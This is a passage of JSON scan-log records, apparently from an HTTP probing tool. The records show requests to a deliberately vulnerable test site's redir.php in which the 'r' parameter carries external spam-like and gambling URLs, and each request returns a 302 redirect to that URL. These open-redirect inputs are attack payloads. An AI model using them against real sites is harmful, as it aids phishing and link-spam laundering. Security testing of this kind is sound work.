HP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:12.767686978Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal63.weebly.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal63.weebly.com/\",\"location\":\"http://indonesianormal63.weebly.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal63.weebly.com/\",\"time\":\"347.765251ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:12.783847656Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal64.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal64.weebly.com\",\"location\":\"http://indonesianormal64.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal64.weebly.com\",\"time\":\"342.680668ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:12.892549036Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal65.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal65.weebly.com\",\"location\":\"http://indonesianormal65.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal65.weebly.com\",\"time\":\"354.087562ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:12.944848376Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal66.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal66.weebly.com\",\"location\":\"http://indonesianormal66.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal66.weebly.com\",\"time\":\"348.007761ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:12.995279462Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal67.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal67.weebly.com\",\"location\":\"http://indonesianormal67.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal67.weebly.com\",\"time\":\"344.120536ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:13.058392934Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal68.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal68.weebly.com\",\"location\":\"http://indonesianormal68.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal68.weebly.com\",\"time\":\"356.18392ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:13.129390225Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal69.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal69.weebly.com\",\"location\":\"http://indonesianormal69.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal69.weebly.com\",\"time\":\"344.140459ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:13.200348899Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal70.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal70.weebly.com\",\"location\":\"http://indonesianormal70.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal70.weebly.com\",\"time\":\"346.86184ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:13.303372622Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal71.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal71.weebly.com\",\"location\":\"http://indonesianormal71.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal71.weebly.com\",\"time\":\"352.178712ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:16.482513268Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal72.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal72.weebly.com\",\"location\":\"http://indonesianormal72.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal72.weebly.com\",\"time\":\"348.748019ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:16.684698785Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal73.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal73.weebly.com\",\"location\":\"http://indonesianormal73.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal73.weebly.com\",\"time\":\"357.005876ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:16.725214645Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal74.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal74.weebly.com\",\"location\":\"http://indonesianormal74.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal74.weebly.com\",\"time\":\"339.031393ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:16.786341799Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal75.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal75.weebly.com\",\"location\":\"http://indonesianormal75.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal75.weebly.com\",\"time\":\"346.087852ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:17.165548184Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal76.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal76.weebly.com\",\"location\":\"http://indonesianormal76.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal76.weebly.com\",\"time\":\"351.694329ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:17.581523869Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal77.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal77.weebly.com\",\"location\":\"http://indonesianormal77.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal77.weebly.com\",\"time\":\"352.549755ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:17.614357843Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal78.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal78.weebly.com\",\"location\":\"http://indonesianormal78.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal78.weebly.com\",\"time\":\"344.638759ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:17.777823957Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal79.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal79.weebly.com\",\"location\":\"http://indonesianormal79.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal79.weebly.com\",\"time\":\"344.393186ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:18.32933029Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal80.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal80.weebly.com\",\"location\":\"http://indonesianormal80.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal80.weebly.com\",\"time\":\"348.139514ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:18.370302804Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal81.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal81.weebly.com\",\"location\":\"http://indonesianormal81.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal81.weebly.com\",\"time\":\"343.524389ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:20.068483941Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal82.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal82.weebly.com\",\"location\":\"http://indonesianormal82.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal82.weebly.com\",\"time\":\"347.806062ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:21.350389019Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal83.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal83.weebly.com\",\"location\":\"http://indonesianormal83.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal83.weebly.com\",\"time\":\"347.434819ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:21.415003027Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal84.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal84.weebly.com\",\"location\":\"http://indonesianormal84.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal84.weebly.com\",\"time\":\"355.573768ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:21.73706053Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal85.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal85.weebly.com\",\"location\":\"http://indonesianormal85.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal85.weebly.com\",\"time\":\"361.481037ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:22.576598337Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal86.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal86.weebly.com\",\"location\":\"http://indonesianormal86.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal86.weebly.com\",\"time\":\"346.425364ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:22.598296242Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal87.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal87.weebly.com\",\"location\":\"http://indonesianormal87.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal87.weebly.com\",\"time\":\"339.718696ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:22.65237647Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal88.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal88.weebly.com\",\"location\":\"http://indonesianormal88.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal88.weebly.com\",\"time\":\"348.573381ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:22.663387438Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal89.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal89.weebly.com\",\"location\":\"http://indonesianormal89.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal89.weebly.com\",\"time\":\"351.554799ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:22.968276503Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal90.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal90.weebly.com\",\"location\":\"http://indonesianormal90.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal90.weebly.com\",\"time\":\"355.880765ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:23.032387301Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal91.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal91.weebly.com\",\"location\":\"http://indonesianormal91.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal91.weebly.com\",\"time\":\"361.691934ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:23.050966967Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal92.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal92.weebly.com\",\"location\":\"http://indonesianormal92.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal92.weebly.com\",\"time\":\"357.077678ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:23.121284358Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal93.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal93.weebly.com\",\"location\":\"http://indonesianormal93.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal93.weebly.com\",\"time\":\"351.316002ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:23.147213852Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal94.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal94.weebly.com\",\"location\":\"http://indonesianormal94.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal94.weebly.com\",\"time\":\"361.114408ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:23.243343178Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal95.weebly.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://indonesianormal95.weebly.com\",\"location\":\"http://indonesianormal95.weebly.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://indonesianormal95.weebly.com\",\"time\":\"348.602603ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:23.286440749Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://jackpotselt.eblogmall.com/football-new-for-tips-1973/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://jackpotselt.eblogmall.com/football-new-for-tips-1973/\",\"location\":\"http://jackpotselt.eblogmall.com/football-new-for-tips-1973/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://jackpotselt.eblogmall.com/football-new-for-tips-1973/\",\"time\":\"338.984863ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:23.351254859Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://jackpotskvc.someothermagazine.com/predictions-soccer-for-ideas-2023/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://jackpotskvc.someothermagazine.com/predictions-soccer-for-ideas-2023/\",\"location\":\"http://jackpotskvc.someothermagazine.com/predictions-soccer-for-ideas-2023/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://jackpotskvc.someothermagazine.com/predictions-soccer-for-ideas-2023/\",\"time\":\"353.401999ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:23.413431114Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://joinsers.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://joinsers.blogspot.com\",\"location\":\"http://joinsers.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://joinsers.blogspot.com\",\"time\":\"352.645889ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:23.483365992Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://joinsers.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://joinsers.blogspot.com/\",\"location\":\"http://joinsers.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/h